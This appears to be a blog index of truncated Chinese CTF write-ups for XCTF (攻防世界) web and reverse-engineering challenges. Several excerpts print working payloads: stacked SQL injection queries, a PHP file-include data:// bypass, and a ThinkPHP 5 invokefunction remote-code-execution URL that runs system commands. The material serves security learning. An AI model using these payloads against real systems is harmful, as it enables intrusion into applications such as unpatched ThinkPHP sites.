攻防世界22-supersqli-Web
攻防世界22-supersqli-CTFWebsql注入,提交1,查询得到信息,看看是否存在注入点 1 union select 1 发现return preg_match(“/select|update|delete|drop|insert|where|./i”,$inject); 存在过滤,这题有多种方法,涨知识 11';show databases; # 11';use supersqli;show tables;# 10';use supersqli;show columns from `1919810931114514`# 字符串为表名操作时要加反引号。 解法1:在MySQL中,handler也可以执行查询 可以查一下handler的使用方法: 10';handler `1919810931114514` open;handler `1919810931114514` read...
攻防世界21-Web_php_unserialize-Web
攻防世界21-Web_php_unserialize-CTFWeb跟反序列化有关 123456789101112131415161718192021222324252627<?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wakeup() { if ($this->file != 'index.php') { //the secret is in the fl4g.php ...
攻防世界20-warmup-Web
攻防世界20-warmup-CTFWeb看源码,提示source.php 1234567891011121314151617181920212223242526272829303132333435363738394041424344454647<?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (! isset($page) || !is_string($page)) { echo "you can't see it"; return...
攻防世界19-upload1-Web
攻防世界19-upload1-CTFWeb进阶跟上传有关,随便上传一个文件,提示上传图片 发现有disabled 解法1:删掉试试,发现可以上传了。 试试上传这个 被执行了 可以修改命令 找到了 解法2:可以试试一句话木马
攻防世界18-Web_php_include-Web
攻防世界18-Web_php_include-CTFWeb进阶看名字可能是文件包含的题 文件包含知识点:文件包含 - Hello CTF (hello-ctf.com)和文件包含漏洞全面详解-CSDN博客 123456789<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);}include($page);?> 解法1:小试牛刀: 代码审计一下发现,php://会被删除掉,看一下能不能用其他的伪协议 data://text/plain,...
攻防世界17-php_rce-Web
攻防世界17-php_rce-CTFWeb进阶 这题没什么头绪,还以为是个广告,提到了ThinkPHPV5,和phprce,可以去查一下 找到了一些帖子,看一下 解法1:发现了这么一个用法: /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami 可以替换一些指令,ls查看没看到一些有用的信息,我用find指令去看看find / -type f -name ‘flag‘ /index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=find / -type f -name...
攻防世界16-unserialize3-Web
攻防世界16-unserialize3-CTFWeb进阶根据题意,很明显是反序列化,反序列化的知识可以自己查,PHP 反序列化基础 - Hello CTF (hello-ctf.com)也行 123456class xctf{public $flag = '111';public function __wakeup(){ exit('bad requests');}?code= 以下是ctf中常用的方法: 1234567891011__wakeup() //------ 执行unserialize()时,先会调用这个函数__sleep() //------- 执行serialize()时,先会调用这个函数__destruct() //---- 对象被销毁时触发__call() //-------- 在对象上下文中调用不可访问的方法时触发__callStatic() //-- 在静态上下文中调用不可访问的方法时触发__get() //---------...
攻防世界15-baby_web-Web
baby_web-CTFWeb进阶wp-攻防世界15描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 直接看云平台报表中心 有个id=1,http://61.147.171.105:53702/index.php?id=1 改成2,3,aaa都没有变化,尝试爆破一下(感觉做多了无非就这几种方式) 改成下面那样开始爆破 找到flag
逆向攻防世界CTF系列56-easy_Maze
逆向攻防世界CTF系列56-easy_Maze64位无壳,看题目就知道是迷宫问题了 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960int __fastcall main(int argc, const char **argv, const char **envp){ __int64 v3; // rax int v5[7][7]; // [rsp+0h] [rbp-270h] BYREF int v6[104]; // [rsp+D0h] [rbp-1A0h] BYREF v6[52] = 1; v6[53] = 1; v6[54] = -1; v6[55] = 1; v6[56] = -1; v6[57] = 1; v6[58] = -1; v6[59] = 0; v6[60] = 0; v6[61] = 0; v6[62] = 0; v6[63] = 1; ...
逆向攻防世界CTF系列55-Replace
逆向攻防世界CTF系列55-Replace32位,upx壳 1234567891011int __cdecl main(int argc, const char **argv, const char **envp){ char Buffer[40]; memset(Buffer, 0, sizeof(Buffer)); printf("Welcome The System\nPlease Input Key:"); gets_s(Buffer, 0x28u); if ( strlen(Buffer) - 35 <= 2 ){ if ( sub_401090(Buffer) == 1 ) printf("Well Done!\n"); else printf("Your Wrong!\n"); } return 0;} 跟进sub401090: 12345678910111213141516171819int __fastcall...










